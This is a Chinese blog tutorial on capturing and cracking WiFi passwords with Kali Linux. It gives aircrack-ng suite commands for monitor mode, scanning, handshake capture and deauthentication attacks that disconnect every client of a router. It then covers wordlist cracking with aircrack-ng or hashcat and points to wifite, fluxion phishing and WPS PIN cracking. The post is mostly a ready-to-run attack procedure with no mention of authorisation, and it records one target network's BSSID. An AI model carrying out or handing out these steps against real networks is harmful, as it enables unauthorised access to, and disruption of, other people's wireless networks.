kalilinux wifi抓包跑包

抓包

注:磊科nw392 8812au无线网卡开启监听模式后仍然为wlan0

1. airmon-ng check kill (关闭所有相关进程 视情况决定)

2. airmon-ng (列出所有识别到的网卡信息)

3. airmon-ng start wlan0 (开启网卡监听模式)

4. airodump-ng wlan0 (扫描wifi信号)

参数解释:

  • BSSID(Basic Service SetIdentifier): AP 的MAC 地址。
  • ESSID(The Extended Service Set Identifier): AP 的名称。
  • PWR(Power): 信号强度。
  • Beacons: AP发出的通告编号,每个接入点(AP)在最低速率(1M)时差不多每秒会发送10个左右的 beacon,所以它们能在很远的地方就被发现。
  • \#Data:当前数据传输量。
  • \#/s:过去10秒钟内每秒捕获数据分组的数量。
  • CH(Channel): AP 所在的频道。
  • MB: AP 的最大传输速度。MB=11 => 802.11b,MB=22 => 802.11b+, MB>22 => 802.11g。后 面带.的表示短封包标头,处理速度快,更利于破解。
  • ENC(Encryption): 使用的加密算法体系。
  • CIPHER: 检测到的加密算法。#这个和ENC 的区别我确实不明白,有没有知道的朋友可以告诉我。
  • AUTH(Authority): 认证方式。
  • Elapsed: 用过的时间。记录 TEST-jglimmers 的 MAC 地址(BSSID),频道(CH)。
  • BSSID: 88:25:93:5A:B5:6A
  • CH: 1

5. airodump-ng --bssid [路由MAC地址] -c [信道] --write [存储文件(如mumu)] wlan0 (开始抓包)

6. aireplay-ng -a [路由MAC地址] -0 5 wlan0 (攻击连接该路由的所有设备 反认证包个数:5)

aireplay-ng -a[路由MAC地址] -c [被攻击客户机MAC地址] --deatu 10

-–deatu:指定发送反认证包的个数,也可以使用-0(阿利伯数字0)来指定反认证包的个数

7. airmon-ng stop wlan0 (关闭监听模式)

跑包

1. ewsa跑包

2. hashcat

3. aircrack-ng [cap包] -w [字典路径]

可指定加密方式

-a1:指定WEP加密方式

-a2:指定WPA-PSk加密方式

傻瓜式操作(监听+抓包+攻击+猜解)

wifite

wifi钓鱼

fluxion

WPS破解 pin码破解

待补充......

 

 

参考:

https://www.kaliorg.com/thread-54-1-4.html

https://www.kaliorg.com/thread-1-1-6.html

暂时无法播放,可回源网站播放

https://www.kaliorg.com/thread-68-1-4.html

网络攻防

kali linux安装rtl8812au驱动

2022-2-1 15:37:03

网络攻防

Burp Suite爆破网站后台密码

2022-9-7 14:18:39

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
今日签到
有新私信 私信列表
搜索
Array ( [0] => post [1] => user [2] => document [3] => newsflashes )